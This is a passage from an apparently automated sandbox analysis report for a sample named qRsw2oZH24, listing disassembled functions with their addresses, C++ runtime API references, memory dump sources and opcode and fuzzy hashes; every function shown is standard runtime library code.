                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                    • String ID:
                                    • API String ID: 2081738530-0
                                    • Opcode ID: 9fe50177145153e4ca4c565073a2de9f4ee9599cd6fff40aadc096756e4a44c1
                                    • Instruction ID: ae285a7103ccfd70f349f806111af63ed8c86916ba607b4fcad2758e792b6568
                                    • Opcode Fuzzy Hash: 9fe50177145153e4ca4c565073a2de9f4ee9599cd6fff40aadc096756e4a44c1
                                    • Instruction Fuzzy Hash: B801A1799002198FCF05EBA88855ABD7B75FF84721F680149FD10E7391DF709A49CB82
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0085C2F2 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0085C303
                                    • int.LIBCPMT ref: 0085C31A
                                      • Part of subcall function 00811837: std::_Lockit::_Lockit.LIBCPMT ref: 00811848
                                      • Part of subcall function 00811837: std::_Lockit::~_Lockit.LIBCPMT ref: 00811862
                                    • std::_Facet_Register.LIBCPMT ref: 0085C354
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0085C374
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0085C381
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                    • String ID:
                                    • API String ID: 2081738530-0
                                    • Opcode ID: b8990525453dff9d683bfd08eb523077e498e3bd821720261b868a5a244f942b
                                    • Instruction ID: d1ad6e529d03613b8df7239ff4bf92228ad78015def0e6daf3ed3be753e04d0e
                                    • Opcode Fuzzy Hash: b8990525453dff9d683bfd08eb523077e498e3bd821720261b868a5a244f942b
                                    • Instruction Fuzzy Hash: 3501C0759002198FCF05ABA8C815AEDBBB9FF84325F684149FD11E7391DF309A49CB82
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0085C25D Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0085C26E
                                    • int.LIBCPMT ref: 0085C285
                                      • Part of subcall function 00811837: std::_Lockit::_Lockit.LIBCPMT ref: 00811848
                                      • Part of subcall function 00811837: std::_Lockit::~_Lockit.LIBCPMT ref: 00811862
                                    • std::_Facet_Register.LIBCPMT ref: 0085C2BF
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0085C2DF
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0085C2EC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                    • String ID:
                                    • API String ID: 2081738530-0
                                    • Opcode ID: a710c65276240e6d3230f9755bcf33b962a2e79dd62618a732119aad811a5b75
                                    • Instruction ID: 60c694fa121e8dc7a31932a28d0d5241165ae88d95617866d7c2d28ba7a57e34
                                    • Opcode Fuzzy Hash: a710c65276240e6d3230f9755bcf33b962a2e79dd62618a732119aad811a5b75
                                    • Instruction Fuzzy Hash: 8C01A1359002299FCF04ABA888156BEBB69FF84321F284149FD10E7291DF749A49CB82
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0085C387 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0085C398
                                    • int.LIBCPMT ref: 0085C3AF
                                      • Part of subcall function 00811837: std::_Lockit::_Lockit.LIBCPMT ref: 00811848
                                      • Part of subcall function 00811837: std::_Lockit::~_Lockit.LIBCPMT ref: 00811862
                                    • std::_Facet_Register.LIBCPMT ref: 0085C3E9
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0085C409
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0085C416
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                    • String ID:
                                    • API String ID: 2081738530-0
                                    • Opcode ID: a3443d0e2557710c0eab1b84afb01c614bf71baad673bba0bdafff345dfc2c90
                                    • Instruction ID: 4a378bb32d84f90401bdead02b171198a52263c7ad62a21f1531e88ee8005a79
                                    • Opcode Fuzzy Hash: a3443d0e2557710c0eab1b84afb01c614bf71baad673bba0bdafff345dfc2c90
                                    • Instruction Fuzzy Hash: 7B01ED3580021A8BCB00EBA8C816AFD7B65FF84321F280108FC11EB281DF709A49CB82
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 008695D6 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 008695E7
                                    • int.LIBCPMT ref: 008695FE
                                      • Part of subcall function 00811837: std::_Lockit::_Lockit.LIBCPMT ref: 00811848
                                      • Part of subcall function 00811837: std::_Lockit::~_Lockit.LIBCPMT ref: 00811862
                                    • std::_Facet_Register.LIBCPMT ref: 00869638
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00869658
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00869665
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                    • String ID:
                                    • API String ID: 2081738530-0
                                    • Opcode ID: 5f37cd8ebbd99263388162b4669ce5dba608a1ec08ac5223793baa1a5bb5dac3
                                    • Instruction ID: 5c39ce9b53ea934c6b4e67f213e50a25572b258981333cfc828a3fa69f72695d
                                    • Opcode Fuzzy Hash: 5f37cd8ebbd99263388162b4669ce5dba608a1ec08ac5223793baa1a5bb5dac3
                                    • Instruction Fuzzy Hash: 7901C0359002199BCF05EBA8C81AAADBB69FF94724F290149F950E72D1DF309A49C782
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00869541 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00869552
                                    • int.LIBCPMT ref: 00869569
                                      • Part of subcall function 00811837: std::_Lockit::_Lockit.LIBCPMT ref: 00811848
                                      • Part of subcall function 00811837: std::_Lockit::~_Lockit.LIBCPMT ref: 00811862
                                    • std::_Facet_Register.LIBCPMT ref: 008695A3
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 008695C3
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 008695D0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                    • String ID:
                                    • API String ID: 2081738530-0
                                    • Opcode ID: 5099dbb3e3301ddab65f5b69db2495301a16d71897f6c83f7fa1ef51234d0641
                                    • Instruction ID: a05dbccbb82b0d26c2b4e76dc785b938a9ab4277ac744f0f1ef05709a30332e4
                                    • Opcode Fuzzy Hash: 5099dbb3e3301ddab65f5b69db2495301a16d71897f6c83f7fa1ef51234d0641
                                    • Instruction Fuzzy Hash: 8301C0759001198BCF05EBA8C819AADBBA9FF84320F290149F951EB2D1DF709A49C782
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0085C670 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0085C681
                                    • int.LIBCPMT ref: 0085C698
                                      • Part of subcall function 00811837: std::_Lockit::_Lockit.LIBCPMT ref: 00811848
                                      • Part of subcall function 00811837: std::_Lockit::~_Lockit.LIBCPMT ref: 00811862
                                    • std::_Facet_Register.LIBCPMT ref: 0085C6D2
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0085C6F2
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0085C6FF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                    • String ID:
                                    • API String ID: 2081738530-0
                                    • Opcode ID: e57bef1f8b16046f06b70cfe14c23a6931439dcdba976fab11518786bbc992e3
                                    • Instruction ID: 010817938109189053255c6fba8aaa4dc98d0edfb3e612bde8e2d63d48cd02ab
                                    • Opcode Fuzzy Hash: e57bef1f8b16046f06b70cfe14c23a6931439dcdba976fab11518786bbc992e3
                                    • Instruction Fuzzy Hash: 0A01A1759001159BCF04EB68C8156AD7BB5FF54321F28414AFD10EB2D1DF749E49CB82
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00869795 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 008697A6
                                    • int.LIBCPMT ref: 008697BD
                                      • Part of subcall function 00811837: std::_Lockit::_Lockit.LIBCPMT ref: 00811848
                                      • Part of subcall function 00811837: std::_Lockit::~_Lockit.LIBCPMT ref: 00811862
                                    • std::_Facet_Register.LIBCPMT ref: 008697F7
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00869817
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00869824
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                    • String ID:
                                    • API String ID: 2081738530-0
                                    • Opcode ID: dad6e469a2d2a4667e974216266b9e118c7628f168c49fbdf187a4936019b32e
                                    • Instruction ID: 17d88bfb7533f04ba4e98c46017cd24b901273e0e151f547b7774ad3c5d34a21
                                    • Opcode Fuzzy Hash: dad6e469a2d2a4667e974216266b9e118c7628f168c49fbdf187a4936019b32e
                                    • Instruction Fuzzy Hash: 5E010035810119CBCF04EBA8C816ABDBBA9FF80725F290119F910E72C1DF309A49C792
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0085C79A Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0085C7AB
                                    • int.LIBCPMT ref: 0085C7C2
                                      • Part of subcall function 00811837: std::_Lockit::_Lockit.LIBCPMT ref: 00811848
                                      • Part of subcall function 00811837: std::_Lockit::~_Lockit.LIBCPMT ref: 00811862
                                    • std::_Facet_Register.LIBCPMT ref: 0085C7FC
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0085C81C
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0085C829
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                    • String ID:
                                    • API String ID: 2081738530-0
                                    • Opcode ID: 4d70909ff06aa2b169871639ad7c5d101f65abb4beda89b59f9c3a2ee2cc5ab1
                                    • Instruction ID: 9c4ed397d566c47a11828585f4ea451fe6f3e4d59dcf44038677dee7e675f32b
                                    • Opcode Fuzzy Hash: 4d70909ff06aa2b169871639ad7c5d101f65abb4beda89b59f9c3a2ee2cc5ab1
                                    • Instruction Fuzzy Hash: 7C0104799102198FCF05EBA8C816ABD7765FF44325F284159FC10E7281DF309A49CB82
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0085C705 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0085C716
                                    • int.LIBCPMT ref: 0085C72D
                                      • Part of subcall function 00811837: std::_Lockit::_Lockit.LIBCPMT ref: 00811848
                                      • Part of subcall function 00811837: std::_Lockit::~_Lockit.LIBCPMT ref: 00811862
                                    • std::_Facet_Register.LIBCPMT ref: 0085C767
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0085C787
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0085C794
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                    • String ID:
                                    • API String ID: 2081738530-0
                                    • Opcode ID: 14a26cc0703d481e337b797bb7c6cbff6fa367e5c7d89bb437cfa08a52da853a
                                    • Instruction ID: 5691a772e3c15828c42fecfc5c8271b93aca8ff0302e0eccf7e8777c325f53ec
                                    • Opcode Fuzzy Hash: 14a26cc0703d481e337b797bb7c6cbff6fa367e5c7d89bb437cfa08a52da853a
                                    • Instruction Fuzzy Hash: 7E01C4359002159FCF14EBACC8556ADB769FF44321F280149FD10E72D1DF709A49CB82
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0085C82F Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0085C840
                                    • int.LIBCPMT ref: 0085C857
                                      • Part of subcall function 00811837: std::_Lockit::_Lockit.LIBCPMT ref: 00811848
                                      • Part of subcall function 00811837: std::_Lockit::~_Lockit.LIBCPMT ref: 00811862
                                    • std::_Facet_Register.LIBCPMT ref: 0085C891
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0085C8B1
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0085C8BE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                    • String ID:
                                    • API String ID: 2081738530-0
                                    • Opcode ID: 18b51761cba139e3a73e04171335163e9bda59331000deb7a8217bf66f3f9579
                                    • Instruction ID: 98b3e978a2e71aee05db85fe173d5a39b5eeaf0d30f77536eeb40e291035a70d
                                    • Opcode Fuzzy Hash: 18b51761cba139e3a73e04171335163e9bda59331000deb7a8217bf66f3f9579
                                    • Instruction Fuzzy Hash: 5F01C0359002199FCB14ABA8C815ABDBB65FF84721F284159FD10EB3D1DF709E49CB82
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0086982A Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0086983B
                                    • int.LIBCPMT ref: 00869852
                                      • Part of subcall function 00811837: std::_Lockit::_Lockit.LIBCPMT ref: 00811848
                                      • Part of subcall function 00811837: std::_Lockit::~_Lockit.LIBCPMT ref: 00811862
                                    • std::_Facet_Register.LIBCPMT ref: 0086988C
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 008698AC
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 008698B9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                    • String ID:
                                    • API String ID: 2081738530-0
                                    • Opcode ID: 7fbbc142bda5f3a184d55e8392e10bda319fa6eb72c99428b4fe8afeab252e6f
                                    • Instruction ID: 5bc215147c9c31fb0cf8d07176906db1887c42245449bee07bee311582ee1910
                                    • Opcode Fuzzy Hash: 7fbbc142bda5f3a184d55e8392e10bda319fa6eb72c99428b4fe8afeab252e6f
                                    • Instruction Fuzzy Hash: 8A0100359001199BCB01ABA8C816ABD7B79FF80320F290119F810EB3C1DF31AA45C782
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0085C9EE Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0085C9FF
                                    • int.LIBCPMT ref: 0085CA16
                                      • Part of subcall function 00811837: std::_Lockit::_Lockit.LIBCPMT ref: 00811848
                                      • Part of subcall function 00811837: std::_Lockit::~_Lockit.LIBCPMT ref: 00811862
                                    • std::_Facet_Register.LIBCPMT ref: 0085CA50
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0085CA70
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0085CA7D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                    • String ID:
                                    • API String ID: 2081738530-0
                                    • Opcode ID: 0b69bfe56e12ccec6e96f56a0b79cc290b9d0093f9c2f98d88f3277bf31a6b3c
                                    • Instruction ID: ec8a1d46f48bb11cd197859abc05cbdb27659b8942651a5a239f533213000ee4
                                    • Opcode Fuzzy Hash: 0b69bfe56e12ccec6e96f56a0b79cc290b9d0093f9c2f98d88f3277bf31a6b3c
                                    • Instruction Fuzzy Hash: 8001EDB5D002298FCF05EBA8C815AAD7B65FF80721F280148FC11E7291DF349A498B82
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0085CA83 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0085CA94
                                    • int.LIBCPMT ref: 0085CAAB
                                      • Part of subcall function 00811837: std::_Lockit::_Lockit.LIBCPMT ref: 00811848
                                      • Part of subcall function 00811837: std::_Lockit::~_Lockit.LIBCPMT ref: 00811862
                                    • std::_Facet_Register.LIBCPMT ref: 0085CAE5
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0085CB05
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0085CB12
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                    • String ID:
                                    • API String ID: 2081738530-0
                                    • Opcode ID: 16a0cc06000e87916e08c844391ea156684ed7caac9e13758f26806eda563024
                                    • Instruction ID: 12290c88c02f5d6f0107e8b2fb4a0726fd3f0b7fa085837e31c755aec8e1f091
                                    • Opcode Fuzzy Hash: 16a0cc06000e87916e08c844391ea156684ed7caac9e13758f26806eda563024
                                    • Instruction Fuzzy Hash: D301A1769002199FCF05AB688816AADBB65FF84321F284149FD11E7291DF749E49CB43
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0085CBAD Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0085CBBE
                                    • int.LIBCPMT ref: 0085CBD5
                                      • Part of subcall function 00811837: std::_Lockit::_Lockit.LIBCPMT ref: 00811848
                                      • Part of subcall function 00811837: std::_Lockit::~_Lockit.LIBCPMT ref: 00811862
                                    • std::_Facet_Register.LIBCPMT ref: 0085CC0F
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0085CC2F
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0085CC3C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                    • String ID:
                                    • API String ID: 2081738530-0
                                    • Opcode ID: b0e25620cf7e92ddcc441a1edbb895028ce9f052d6c71c2d50fa3773314c7eb9
                                    • Instruction ID: 67d26753ad544e4004dbba08888cca193147d10250f04bb6c75fcf26c4dc23d7
                                    • Opcode Fuzzy Hash: b0e25620cf7e92ddcc441a1edbb895028ce9f052d6c71c2d50fa3773314c7eb9
                                    • Instruction Fuzzy Hash: 8F01A1359002199FCF04AB6888166AD7B65FF44321F284549FD10E7391DF709E49CB42
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 008896D1 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 008896E9
                                      • Part of subcall function 00880123: RtlFreeHeap.NTDLL(00000000,00000000,?,0087DA9C), ref: 00880139
                                      • Part of subcall function 00880123: GetLastError.KERNEL32(?,?,0087DA9C), ref: 0088014B
                                    • _free.LIBCMT ref: 008896FB
                                    • _free.LIBCMT ref: 0088970D
                                    • _free.LIBCMT ref: 0088971F
                                    • _free.LIBCMT ref: 00889731
